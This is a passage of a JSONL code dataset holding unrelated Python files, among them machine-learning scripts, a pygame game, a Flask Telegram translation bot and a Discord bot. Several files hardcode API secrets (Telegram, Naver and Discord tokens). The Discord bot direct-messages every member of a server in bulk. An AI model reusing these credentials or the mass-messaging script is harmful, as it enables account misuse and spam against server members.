is_one_pair(hand2)\n return int(pair1 > pair2)\n\n else:\n return int(score1 > score2)\n\n\ndef is_full_house(hand):\n # This only works because there are no 4-of-a-kinds\n values = sorted([my_integer(card[0]) for card in hand])\n return int(len(set(values)) == 2)\n\n\ndef is_flush(hand):\n # No royal flushes or straight flushes by inspection\n # Two regular flushes though\n suits = [card[1] for card in hand]\n return all(i == suits[0] for i in suits)\n\n\ndef 
is_straight(hand):\n # Looks like there are about 12 of these \n values = sorted([my_integer(card[0]) for card in hand])\n straight = range(values[0], values[0] + 5)\n return all([i == j for i, j in zip(straight, values)])\n\n\ndef is_three_of_a_kind(hand):\n values = [my_integer(card[0]) for card in hand]\n\n for i in range(3):\n if values.count(values[i]) == 3:\n return True\n\n else:\n return False\n\n\ndef is_two_pair(hand):\n values = [my_integer(card[0]) for card in hand]\n return int(len(set(values)) == 3) # Since we've already tested for 3-of-a-kind\n\n\ndef is_one_pair(hand):\n\n values = [my_integer(card[0]) for card in hand]\n\n if len(set(values)) != 4:\n return 0\n\n else:\n for i in range(4):\n if values.count(values[i]) == 2:\n return values[i]\n\n\n# Count number of times player 1 wins\ncount = 0\nfor i, line in enumerate(hands):\n hand1, hand2 = line[:5], line[5:]\n count += compare_hands(hand1, hand2)\n\nend_time = time.time() \nrun_time = end_time - start_time\n\nprint(\"--------------------------------------------\")\nprint(\"| Solution to Project Euler problem 54: |\" )\nprint(\"--------------------------------------------\")\nprint(\"Answer: {:d}\".format(count) )\nprint(\"Wall time: {:3.3f} seconds\".format(run_time) )\n","sub_path":"54/54.py","file_name":"54.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"553210195","text":"from __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport compas_rhino\nfrom compas_rhino.artists import Artist\n\n__all__ = [\"PrimitiveArtist\"]\n\n\nclass PrimitiveArtist(Artist):\n \"\"\"Base class for all artists for ``compas.geometry.Primitive``.\n\n Parameters\n ----------\n primitive: :class:`compas.geometry.Primitive`\n The instance of the primitive.\n name : str, optional\n The name of the primitive object.\n color : 3-tuple, optional\n The RGB color specification of the object.\n layer : str, optional\n The parent layer of the object.\n\n Attributes\n ----------\n primitive: :class:`compas.geometry.Primitive`\n A reference to the geometry of the primitive.\n\n \"\"\"\n\n __module__ = \"compas_rhino.artists\"\n\n def __init__(self, primitive, name=None, color=None, layer=None):\n super(PrimitiveArtist, self).__init__()\n self.primitive = primitive\n self.name = name\n self.color = color\n self.layer = layer\n\n @classmethod\n def from_data(cls, data):\n module, attr = data['dtype'].split('/')\n Primitive = getattr(__import__(module, fromlist=[attr]), attr)\n primitive = Primitive.from_data(data['value'])\n artist = cls(primitive)\n return artist\n\n def to_data(self):\n return self.primitive.to_data()\n\n def clear_layer(self):\n \"\"\"Clear the main layer of the artist.\"\"\"\n if self.layer:\n compas_rhino.clear_layer(self.layer)\n else:\n compas_rhino.clear_current_layer()\n\n\n# ==============================================================================\n# Main\n# ==============================================================================\n\nif __name__ == '__main__':\n pass\n","sub_path":"src/compas_rhino/artists/primitiveartist.py","file_name":"primitiveartist.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"23583105","text":"from sklearn.cluster import KMeans\nimport keras\nfrom keras import Sequential, Model\nfrom keras.layers import Conv2D, UpSampling2D, 
MaxPool2D, Dense, Reshape, Flatten\nfrom keras import backend as K\nimport glob\nfrom PIL import Image\nfrom PIL.ImageOps import mirror\nimport matplotlib.pyplot as plt\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport shutil\n\ntrain_df = pd.read_csv(\"input/train_relationships.csv\")\n\nM = 1000\ni = 0\nimage_datas = list()\nfor path in train_df.p1:\n for f in glob.glob('input/train/' + path + \"/*.jpg\", recursive=True):\n temp = Image.open(f)\n image = temp.copy()\n image_datas.append(image)\n temp.close()\n i += 1\n if i == M:\n break\n if i == M:\n break\n\nnp.random.shuffle(image_datas)\n\nfor i in range(len(image_datas)):\n image_datas[i] = image_datas[i].resize((64, 64), Image.ANTIALIAS)\n\nfor i in range(len(image_datas)):\n image_datas[i] = np.asarray(image_datas[i]) / 255.\nimage_datas = np.array(image_datas)\n\nencoder = Sequential([\n Conv2D(filters=32, kernel_size=18, strides=1, activation=\"relu\", padding=\"same\", input_shape=(64, 64, 3)),\n MaxPool2D(pool_size=2, padding=\"same\"),\n Conv2D(filters=64, kernel_size=11, strides=1, activation=\"relu\", padding=\"same\"),\n MaxPool2D(pool_size=2, padding=\"same\"),\n Conv2D(filters=128, kernel_size=3, strides=1, activation=\"relu\", padding=\"same\"),\n MaxPool2D(pool_size=2, padding=\"same\"),\n Flatten(),\n Dense(200),\n Dense(100),\n Dense(20),\n Dense(8)\n])\ndecoder = Sequential([\n Dense(20, input_shape=(1, 8)),\n Dense(100),\n Dense(200),\n Dense(8192),\n Reshape((8, 8, 128)),\n UpSampling2D(2),\n Conv2D(filters=64, kernel_size=3, strides=1, activation=\"relu\", padding=\"same\"),\n UpSampling2D(2),\n Conv2D(filters=32, kernel_size=11, strides=1, activation=\"relu\", padding=\"same\"),\n UpSampling2D(2),\n Conv2D(filters=3, kernel_size=18, strides=1, activation=\"sigmoid\", padding=\"same\")\n])\nautoencoder = Sequential([encoder, decoder])\n\nautoencoder.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"binary_crossentropy\"])\n\nbatch_size = 32\nepochs = 10\nlearning_rate = 0.1\n\nhistory = autoencoder.fit(image_datas.reshape(image_datas.shape), image_datas.reshape(-1, 64, 64, 3), batch_size, epochs, validation_split=0.2, verbose=1)\n\nplt.figure(figsize=(10,10))\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\nencoder.summary()\ndecoder.summary()\n\nn_img = 4\nind = np.random.choice(range(len(image_datas)), n_img)\npred = autoencoder.predict(image_datas[ind], batch_size)\n\nf, ax = plt.subplots(2, n_img, figsize=(10, 10))\nfor i in range(n_img):\n ax[0][i].imshow(image_datas[ind[i]])\n ax[1][i].imshow(pred[i])\n\n # import winsound\n # frequency = 440 # Set Frequency To 2500 Hertz\n # duration = 1000 # Set Duration To 1000 ms == 1 second\n # winsound.Beep(frequency, duration)\n # winsound.Beep(440, 1000)\n","sub_path":"trials.py","file_name":"trials.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"314179730","text":"from flask import Flask, render_template, request\nfrom pprint import pprint\nimport requests\n\napp = Flask(__name__)\n\n# 요청을 위한 기본 준비\ntoken = '805457410:AAGhgJeP4X79yj8TKWsrr_shUYbvjMWEZUo'\nchat_id = '749251074'\nnaver_client_id = 'bej3naFebiOt4saB3r0h'\nnaver_client_secret = '2u4UN7QruP'\n\napp_url = f'https://api.telegram.org/bot{token}'\n\n@app.route('/')\ndef 
hello_world():\n return 'Hello, World!'\n\n@app.route('/write')\ndef write():\n return render_template('write.html')\n\n@app.route('/send')\ndef send():\n #1. 사용자가 보낸 메시지를 받아서 text 변수에 저장하자\n text = request.args.get('msg')\n\n #2. Telegram bot이 chat_id를 가진 사람에게 메시지를 보낸다.\n message_url = f'{app_url}/sendMessage?chat_id={chat_id}&text={text}'\n\n #3. 텔레그램 ���버로 메시지 전송\n requests.get(message_url)\n\n return render_template('send.html')\n\n@app.route('/telegram', methods=['POST'])\ndef telegram():\n telegram_response = request.get_json()\n # pprint(telegram_response)\n # print(request)\n\n if telegram_response.get('message') is not None:\n chat_id = telegram_response.get('message').get('chat').get('id')\n text = telegram_response.get('message').get('text')\n # requests.get(f'{app_url}/sendMessage?chat_id={chat_id}&text={text}')\n\n if text[0:4] == '/번역 ':\n headers = {\n 'X-Naver-Client-Id': naver_client_id,\n 'X-Naver-Client-Secret': naver_client_secret\n }\n\n data = {\n 'source': 'ko',\n 'target': 'ja',\n 'text': text[4:]\n }\n\n papage_response = requests.post(\n 'https://openapi.naver.com/v1/papago/n2mt',\n headers=headers,\n data=data\n ).json()\n\n # pprint(papage_response)\n text = papage_response.get('message').get('result').get('translatedText')\n requests.get(f'{app_url}/sendMessage?chat_id={chat_id}&text={text}')\n return '', 200\n\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"SSAFY/Python_lecture/lectures-justin-master/StartCamp/telegram_bot/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"611883324","text":"bdata = bytes(range(0,256))\nprint(len(bdata))\nprint(bdata[255])\n\nfout = open('bfile.raw','wb')\nprint(fout.write(bdata),'bytes writed!') #write는 파일에 쓴 바이트 수를 반환함.\nfout.close()\n\n######################################################\nfout = open ('bfile.raw','wb')\nsize = len (bdata)\nprint(size,'bytes!!')\noffset = 0\nchunk = 100\nwhile True:\n if offset > size :\n break\n fout.write(bdata[offset:offset+chunk])\n offset += chunk\nfout.close()\n\n#######################################################\nfin = open('bfile.raw','rb')\nbdata_read = fin.read()\nprint(len(bdata_read))\nfin.close()\n\n########################################################\n\nfin=open('bfile.raw','rb')\nprint(fin.tell())\nfin.seek(255) #현재 오프셋을 반환함!\nprint(fin.tell())\nbdata_read = fin.read()\nprint('current length of bdata_read =',len(bdata_read))\nprint(bdata_read[0])\n\n#######################################################\nimport os\nfin = open('bfile.raw','rb')\nfin.seek(-1,os.SEEK_END)\nprint(fin.tell())\nbdata_read = fin.read()\nprint(len(bdata_read))\nprint(bdata_read[0])\n\nfin.seek(254,os.SEEK_SET)\nprint(fin.tell())\nfin.seek(1,os.SEEK_CUR)\nprint(fin.tell())\nfin.seek(-5,os.SEEK_END)\nprint(fin.tell())\nbdata_read = fin.read()\nprint('===================')\nfor i in bdata_read :\n print(i)\n\n\n","sub_path":"Ch08/08_02_bfile_handler.py","file_name":"08_02_bfile_handler.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"148018864","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('fundraising', '0031_auto_20150604_0813'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='donation',\n 
old_name='amount',\n new_name='subscription_amount',\n ),\n migrations.AlterField(\n model_name='donation',\n name='subscription_amount',\n field=models.DecimalField(blank=True, null=True, decimal_places=2, max_digits=9),\n preserve_default=True,\n ),\n migrations.RemoveField(\n model_name='donation',\n name='stripe_charge_id',\n ),\n ]\n","sub_path":"fundraising/migrations/0032_auto_20150604_0813.py","file_name":"0032_auto_20150604_0813.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"346881562","text":"import discord\nfrom discord.ext import commands\n\nclient = commands.Bot(command_prefix = 'r!')\n\n@client.event\nasync def on_ready():\n print('Ready!')\n \n\n@client.command()\nasync def dmall(ctx, global_guildid : int,*, message):\n master = [391425164123963394,600471112140324864]\n login_status = 0\n test = ctx.author.id\n for a in master:\n if test == a:\n login_status = login_status + 1\n if login_status == 1:\n guild = client.get_guild(int(global_guildid))\n msg = await ctx.channel.send('> 메시지 전송 작업이 시작되었습니다.')\n su = 0\n fa = 0\n sul = 0\n user = []\n for channelz in guild.members:\n print(channelz)\n user.append(channelz.name)\n print(user)\n for channelz in guild.members:\n \n try:\n channel2 = await channelz.create_dm()\n await channel2.send(message)\n su = su + 1\n except:\n fa = fa + 1\n pass\n try:\n sul = sul + 1\n sui = user[sul]\n print(sui)\n msg1 = '> 메시지를 전송중입니다. \\n > 전송중인 유저 : {0} \\n > {1}명에게 메시지가 전송되었습니다\\n > {2}명에게 메시지가 전송되지 않았습니다.'.format(sui,su,fa)\n await msg.edit(content=msg1)\n except:\n pass\n msg2 = '> 메시지 전송이 완료되었습니다. \\n > 총 {0}명에게 메시지가 전송되었으며\\n > {1}명에게 메시지가 전송되지 않았습니다.'.format(su,fa)\n await msg.edit(content=msg2)\n else:\n await ctx.channel.send('[Error] 등록된 사용자가 아닙니다.')\nt = 'NjgxMzA2NjI4NzY2OTU3NTc2.XlNGUg.xayXw8PM1KKct7KC1WZMu7pBAc0'\nclient.run(t)\n\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"417197268","text":"import sys\n\npng = sys.argv[1]\npng = png.lower().endswith(\".png\")\nprint(png)\n\n\"\"\"\nPNG ИЗОБРАЖЕНИЕ?\nНапишите программу, которая первым аргументом командной строки\nпринимает название файла, а после выводит True если это png изображение, \nи False в противном случае.\nОпределять png это или нет нужно по расширению файла.\nУчитывайте, что имя может быть набрано в разных регистрах.\n> python program.py photo.png\n> True\n> python program.py photo.jpg\n> False\n> python program.py ROOM.PNG\n> True\n\"\"\"","sub_path":"shultais_courses/data_types/string_methods_string_conditions/png_picture.py","file_name":"png_picture.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"141842686","text":"import argparse\nimport numpy as np\nimport os\nfrom utils_vae import img_tile, mnist_reader\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--epoch\", type=int, default=40)\n parser.add_argument(\"--nz\", type=int, default=20)\n parser.add_argument(\"--layersize\", type=int, default=400)\n parser.add_argument(\"--alpha\", type=float, default=1)\n parser.add_argument(\"--lr\", type=float, default=0.0001)\n parser.add_argument(\"--b1\", type=float, default=0.9)\n parser.add_argument(\"--b2\", type=float, 
default=0.999)\n parser.add_argument(\"--e\", type=float, default=1e-8)\n parser.add_argument(\"--bsize\", type=int, default=64)\n return parser.parse_args()\n\nargs = parse_args()\n\n\nnp.random.seed(111)\n\nclass VAE(nn.Module):\n def __init__(self, numbers):\n super().__init__()\n\n self.numbers = numbers\n\n self.epochs = args.epoch\n self.batch_size = args.bsize\n self.learning_rate = args.lr\n self.decay = 0.001\n self.nz = args.nz\n self.layersize = args.layersize\n\n self.img_path = \"./images\"\n if not os.path.exists(self.img_path):\n os.makedirs(self.img_path)\n\n # Xavier initialization is used to initialize the weights\n # init encoder weights\n self._e_W0 = np.random.randn(784, self.layersize).astype(np.float32) * np.sqrt(2.0/(784))\n self._e_b0 = np.zeros(self.layersize).astype(np.float32)\n\n self._e_W_mu = np.random.randn(self.layersize, self.nz).astype(np.float32) * np.sqrt(2.0/(self.layersize))\n self._e_b_mu = np.zeros(self.nz).astype(np.float32)\n\n self._e_W_logvar = np.random.randn(self.layersize, self.nz).astype(np.float32) * np.sqrt(2.0/(self.layersize))\n self._e_b_logvar = np.zeros(self.nz).astype(np.float32)\n\n # init decoder weights\n self._d_W0 = np.random.randn(self.nz, self.layersize).astype(np.float32) * np.sqrt(2.0/(self.nz))\n self._d_b0 = np.zeros(self.layersize).astype(np.float32)\n\n self._d_W1 = np.random.randn(self.layersize, 784).astype(np.float32) * np.sqrt(2.0/(self.layersize))\n self._d_b1 = np.zeros(784).astype(np.float32)\n\n #\n self.e_W0 = nn.Parameter(torch.from_numpy(self._e_W0).float())\n self.e_b0 = nn.Parameter(torch.from_numpy(self._e_b0).float())\n self.e_W_mu = nn.Parameter(torch.from_numpy(self._e_W_mu).float())\n self.e_b_mu = nn.Parameter(torch.from_numpy(self._e_b_mu).float())\n self.e_W_logvar = nn.Parameter(torch.from_numpy(self._e_W_logvar).float())\n self.e_b_logvar = nn.Parameter(torch.from_numpy(self._e_b_logvar).float())\n\n self.d_W0 = nn.Parameter(torch.from_numpy(self._d_W0).float())\n self.d_b0 = nn.Parameter(torch.from_numpy(self._d_b0).float())\n self.d_W1 = nn.Parameter(torch.from_numpy(self._d_W1).float())\n self.d_b1 = nn.Parameter(torch.from_numpy(self._d_b1).float())\n\n # init Adam optimizer\n self.b1 = args.b1\n self.b2 = args.b2\n self.e = args.e\n self.m = [0] * 10\n self.v = [0] * 10\n self.t = 0\n\n def encoder(self, img):\n #self.e_logvar : log variance\n #self.e_mean : mean\n\n e_input = np.reshape(img, (self.batch_size,-1))\n e_input = torch.from_numpy(e_input).float()\n\n e_h0_l = torch.matmul(e_input, self.e_W0) + self.e_b0\n e_h0_a = nn.LeakyReLU(negative_slope=0.01)(e_h0_l)\n\n e_logvar = torch.matmul(e_h0_a, self.e_W_logvar) + self.e_b_logvar\n e_mu = torch.matmul(e_h0_a, self.e_W_mu) + self.e_b_mu\n\n return e_mu, e_logvar\n\n def decoder(self, z):\n #self.d_out : reconstruction image 28x28\n\n z = z.view(self.batch_size, self.nz)\n\n d_h0_l = torch.matmul(z, self.d_W0) + self.d_b0\n d_h0_a = torch.relu(d_h0_l)\n\n d_h1_l = torch.matmul(d_h0_a, self.d_W1) + self.d_b1\n d_h1_a = torch.sigmoid(d_h1_l)\n\n d_out = d_h1_a.view(self.batch_size, 28, 28, 1)\n\n return d_out\n\n def forward(self, x):\n #Encode\n mu, logvar = self.encoder(x)\n\n #use reparameterization trick to sample from gaussian\n sample_z = mu + torch.exp(logvar * .5) * torch.from_numpy(np.random.standard_normal(size=(self.batch_size, self.nz))).float()\n\n decode = self.decoder(sample_z)\n\n return decode, mu, logvar, None, sample_z\n\n def train(self, optimizer):\n\n #Read in training data\n trainX, _, train_size = 
mnist_reader(self.numbers)\n\n np.random.shuffle(trainX)\n\n #set batch indices\n batch_idx = train_size//self.batch_size\n batches_per_epoch = min(10, batch_idx)\n # batches_per_epoch = batch_idx\n del batch_idx\n\n total_loss = 0\n total_kl = 0\n total = 0\n\n for epoch in range(self.epochs):\n for idx in range(batches_per_epoch):\n # prepare batch and input vector z\n train_batch = trainX[idx*self.batch_size:idx*self.batch_size + self.batch_size]\n #ignore batch if there are insufficient elements\n if train_batch.shape[0] != self.batch_size:\n break\n\n ################################\n # Forward Pass\n ################################\n\n out, mu, logvar, _, sample_z = self(train_batch)\n\n # Reconstruction Loss\n rec_loss = nn.BCELoss(reduction='sum')(out, torch.from_numpy(train_batch).float())\n\n #K-L Divergence\n # kl = -0.5 * np.sum(1 + logvar - np.power(mu, 2) - np.exp(logvar))\n kl = -0.5 * torch.sum(1 + logvar - mu ** 2 - torch.exp(logvar))\n\n loss = rec_loss + kl\n loss = loss / self.batch_size\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n rec_loss = rec_loss.item()\n kl = kl.item()\n\n #Loss Recordkeeping\n total_loss += rec_loss / self.batch_size\n total_kl += kl / self.batch_size\n total += 1\n\n self.img = np.squeeze(out.data.numpy(), axis=3) * 2 - 1\n\n print(\"Epoch [%d] Step [%d/%d] RC Loss:%.4f KL Loss:%.4f lr: %.4f\"%(\n epoch, idx, batches_per_epoch, rec_loss / self.batch_size, kl / self.batch_size, self.learning_rate))\n\n sample = np.array(self.img)\n\n #save image result every epoch\n img_tile(sample, self.img_path, epoch, idx, \"res\", True)\n\n\nif __name__ == '__main__':\n\n # Adjust the numbers that appear in the training data. Less numbers helps\n # run the program to see faster results\n numbers = [1, 2, 3]\n model = VAE(numbers)\n\n for name, p in model.named_parameters():\n print(name, p.shape)\n\n optimizer = optim.Adam(model.parameters(), lr=args.lr, betas=(args.b1, args.b2), eps=args.e)\n model.train(optimizer)\n","sub_path":"torchvae.py","file_name":"torchvae.py","file_ext":"py","file_size_in_byte":7034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"135642264","text":"from Common.TradingDay import TradingDay\nfrom Common.OracleConnector import OracleConnector\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\n\n\nclass marketdata(object):\n def __init__(self, startdate):\n # get trading days\n td = TradingDay()\n enddate = td.getLastTradingDay()\n self.tradedays = td.getDuration(startdate, enddate)\n\n # get stock list\n oc = OracleConnector()\n self.connection = oc.getConn()\n sqls_stocklist = \"select F16_1090,OB_OBJECT_NAME_1090,F23_1090,F27_1090 from WIND.TB_OBJECT_1090 where F4_1090='A'and F19_1090='0' and F21_1090='1' order by F16_1090 asc\"\n self.df_stocklist = pd.read_sql(sql=sqls_stocklist, con=self.connection)\n\n def getMarketData(self, count):\n stocklist = self.df_stocklist['F16_1090']\n df_price = pd.DataFrame()\n df_price['TRADE_DT'] = self.tradedays\n # print(df_price)\n\n for stock in stocklist[:count]:\n print(stock)\n sqls = \"\"\"select F2_1425,F4_1425,F5_1425,F6_1425,F7_1425,F8_1425,F9_1425 from WIND.TB_OBJECT_1425, WIND.TB_OBJECT_1090 where F1_1425=F2_1090 and f16_1090 ='%s'and F2_1425> '20190101' and F4_1090= 'A' order by F2_1425 asc\"\"\" \\\n % stock\n df_stock = pd.read_sql(sql=sqls, con=self.connection)\n stock_temp = '%s' % stock\n df_price[stock_temp] = df_stock['F4_1425']\n\n # df_price.to_csv('D:\\\\app\\\\test.csv', 
sep=',', header=True, index=True)\n print(df_price)\n\n\nclass calculation(object):\n def __init__(self):\n pass\n\n def closeprice(self,k1,k2,k3,decay,combo,k0):\n # df = pd.read_csv('D:\\\\app\\\\matlab_comparison\\\\close.csv')\n df = pd.read_csv('/home/PerformanceAnalysis/Performance/AccountMonitor/Others/close.csv')\n # print(df)\n matrix = df.as_matrix()\n size = np.shape(matrix)\n [rows, cols] = size\n matrix_temp = np.zeros(size)\n # print(matrix_temp)\n\n tic = datetime.now()\n for i in range(cols):\n for j in range(rows-k0, rows):\n x1 = matrix[j - k1 + 1:j + 1, i]\n x2 = matrix[j - k2 - k1 + 1:j - k2 + 1, i]\n x3 = matrix[j - k3 - k1 + 1:j - k3 + 1, i]\n y1 = x1 / x2\n y2 = x1 / x3\n # print(x1, x2, x3)\n\n corr = np.corrcoef(y1, y2)\n # print(corr)\n\n matrix_temp[j, i] = -corr[0][1]\n print(matrix_temp)\n toc = datetime.now()\n print('Processing time: %f seconds' % (toc - tic).total_seconds())\n\nif __name__ == '__main__':\n # startdate = '20190102'\n # mkt = marketdata(startdate)\n # mkt.getMarketData(100)\n\n cal = calculation()\n cal.closeprice(5, 1, 13, 1, 1, 1422)\n","sub_path":"Others/testets.py","file_name":"testets.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"37639442","text":"# Gello game\n# Created by djengineer 2018-2020\n\nimport pygame\nimport time\nfrom random import randint\n\npygame.init()\npygame.font.init()\nscreenwidth = 1024\nscreenheight = 500\nsize = (screenwidth,screenheight)\nscreen = pygame.display.set_mode(size)\nbgcolor = (255,255,255)\npygame.display.set_caption(\"move and bounce a ball\")\n\n# Initialize variables\n########## initialize all button states ##########\nis_key_pressed = {\"up\" : False,\"down\" : False,\"left\" : False,\"right\" : False}\nfinished = False\nstart = False\nmain_menu = True\ngame_over = False\n\n#initialize functions here\ndef listen_key_press():\n global start\n global main_menu\n global game_over\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n start = not start\n main_menu = not main_menu\n if game_over == True:\n game_over = not game_over\n main_menu = True\n start = False\n if event.key == pygame.K_UP:\n is_key_pressed[\"up\"] = True\n if event.key == pygame.K_DOWN:\n is_key_pressed[\"down\"] = True\n if event.key == pygame.K_LEFT:\n is_key_pressed[\"left\"] = True\n if event.key == pygame.K_RIGHT:\n is_key_pressed[\"right\"] = True\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_UP:\n is_key_pressed[\"up\"] = False\n if event.key == pygame.K_DOWN:\n is_key_pressed[\"down\"] = False\n if event.key == pygame.K_LEFT:\n is_key_pressed[\"left\"] = False\n if event.key == pygame.K_RIGHT:\n is_key_pressed[\"right\"] = False\n\n\n\n#initialize class here\nclass enemy:\n def __init__(self,name,speed,color,position,width):\n self.name = name\n self.speed = speed\n self.color = color\n self.position = position\n self.width = width\n self.direction = self.set_dir()\n def set_dir(self):\n #instead of lists, we use a dictionary here\n move_direction = {\"X\":randint(-self.speed,self.speed),\"Y\":randint(-self.speed,self.speed)}\n while move_direction[\"X\"] == 0 and move_direction[\"Y\"] == 0:\n move_direction = {\"X\":randint(-self.speed,self.speed),\"Y\":randint(-self.speed,self.speed)}\n return move_direction\n def movement_controller(self):\n if self.position[0] < screenwidth and self.position[0] > 0 and self.position[1] < screenheight and self.position[1] > 0:\n self.position[0] += 
self.direction[\"X\"]\n self.position[1] += self.direction[\"Y\"]\n self.boundary_controller()\n def boundary_controller(self):\n if self.position[0] <= 0: #left screen boundary\n #print(\"Left Bound\")\n self.position[0] += 5\n self.position[1] += 0\n self.direction = self.set_dir()\n if self.position[0] >= screenwidth: #right screen boundary\n #print(\"Right Bound\")\n self.position[0] -= 5\n self.position[1] -= 5\n self.direction = self.set_dir()\n if self.position[1] <= 0: #top screen boundary\n #print(\"Top Bound\")\n self.position[0] += 0\n self.position[1] += 5\n self.direction = self.set_dir()\n if self.position[1] >= screenheight: #bottom screen boundary\n #print(\"Bottom Bound\")\n self.position[0] -= 5\n self.position[1] -= 5\n self.direction = self.set_dir()\n def draw(self):\n pygame.draw.circle(screen,self.color,self.position, self.width, 0)\n def collision_detection(self):\n global game_over\n global start\n #Assuming single player only. Need more loops like enemy ball if more than one player\n #if abs(p1.position[0] - self.position[0] < self.width > 0) and abs(p1.position[1] - self.position[1] < self.width > 0):\n # print(self.name+\" Collide\")\n x = abs(p1.position[0] - self.position[0])\n y = abs(p1.position[1] - self.position[1])\n if x < self.width > 0 and y < self.width > 0:\n #reset coordinate of this collided ball, if not game cannot continue\n #self.position = [randint(0,screenwidth),randint(0,screenheight)]\n self.position = [screenwidth,screenheight]\n game_over = True\n start = False\n def all_play_functions(self):\n self.draw()\n self.movement_controller()\n self.boundary_controller()\n self.collision_detection()\n\n\nclass player:\n def __init__(self,name,position,color,width,speed):\n self.name = name\n self.position = position\n self.color = color\n self.width = width\n self.speed = speed\n def draw(self):\n pygame.draw.circle(screen,self.color,self.position, self.width, 0)\n def ball_movement_controller(self):\n # pygame's position starts from the TOP LEFT of the screen surface at (0,0)\n # X +1 will move it rightwards. How about X -1?\n # Y +1 will move it downwards. 
How about Y -1?\n # when up key pressed, y-coordinate -1 for as long as the key is pressed.\n if is_key_pressed[\"up\"] == True and self.position[1]>=0:\n self.position[1] -= self.speed\n if is_key_pressed[\"down\"] == True and self.position[1] <= screenheight:\n self.position[1] += self.speed\n if is_key_pressed[\"left\"] == True and self.position[0]>=0:\n self.position[0] -= self.speed\n if is_key_pressed[\"right\"] == True and self.position[0] <= screenwidth:\n self.position[0] += self.speed\n def all_player_functions(self):\n self.draw()\n self.ball_movement_controller()\n \n#load classes here\n#player\np1_ball_pos=[60,70]\np1_ball_color=(60,20,10)\np1_ball_width = 20\np1_ball_speed = 3\np1 = player(\"p1\",p1_ball_pos,p1_ball_color,p1_ball_width,p1_ball_speed)\n#enemy(name,speed,color,position,width,direction)\nenemy_count = 10\nmax_enemy_speed = 1\nenemy_obj_list = []\n\n\n# e1 starts at index 0\nfor x in range(0,enemy_count):\n width = 20\n color = (randint(0,255),randint(0,255),randint(0,255))\n position = [randint(0,screenwidth),randint(0,screenheight)]\n speed = randint(1,max_enemy_speed)\n enemy_obj_list.append(enemy(\"e\"+str(x+1),speed,color,position,width))\n\n\n##### Game Loop #####\nwhile finished == False:\n screen.fill(bgcolor)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n listen_key_press()\n if main_menu == True and start == False:\n headerfont = pygame.font.SysFont(\"monospace\", 30)\n title = headerfont.render(\"Press Space to Start\",1,(0,0,0))\n screen.blit(title,(100,80))\n if start == True and main_menu == False:\n ## Load Enemies in Game Loop\n for enemy in enemy_obj_list:\n enemy.all_play_functions()\n ## Load player 1 in Game Loop\n p1.all_player_functions()\n if game_over == True and start == False:\n headerfont = pygame.font.SysFont(\"monospace\", 30)\n title = headerfont.render(\"Game Over. 
Press Space to Main Menu.\",1,(0,0,0))\n screen.blit(title,(100,80))\n for enemy in enemy_obj_list:\n enemy.position = [screenheight,screenwidth];\n pygame.display.flip()\nwhile finished == True:\n pygame.quit()\n","sub_path":"GelloGame.py","file_name":"GelloGame.py","file_ext":"py","file_size_in_byte":7262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"316764094","text":"'''\nName: Sai Venkatesh Kurella\nCampus ID: VR62250\nCMSC 678 -Introduction to Machine Learning\nHomework-2\n\n'''\n\n\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport matplotlib.pyplot as plot\nfrom random import random,shuffle,sample\nfrom operator import itemgetter\n\n\ndef accuracy(testdata,actual_label,weights,bias): #accuracy function\n correct = 0\n for i in range(len(testdata)):\n pred = prediction(testdata[i],weights,bias)\n if pred == actual_label[i][0]: correct += 1\n return correct/float(len(testdata))*100\n\ndef prediction(inputs,weights,bias): #prediction fuction that handles inputs and weights\n activation = 0\n for input,weight in zip(inputs,weights):\n activation += input*weight + bias\n if activation > 0:\n return 1\n else:\n return -1\n\ndef perceptron(train_data,train_label,test_data,test_label,iteration): #perceptron function\n session = tf.compat.v1.Session()\n data_train = tf.compat.v1.placeholder(dtype=tf.float32,shape = [28*28])\n label_train = tf.compat.v1.placeholder(dtype= tf.float32,shape = [1])\n weight = 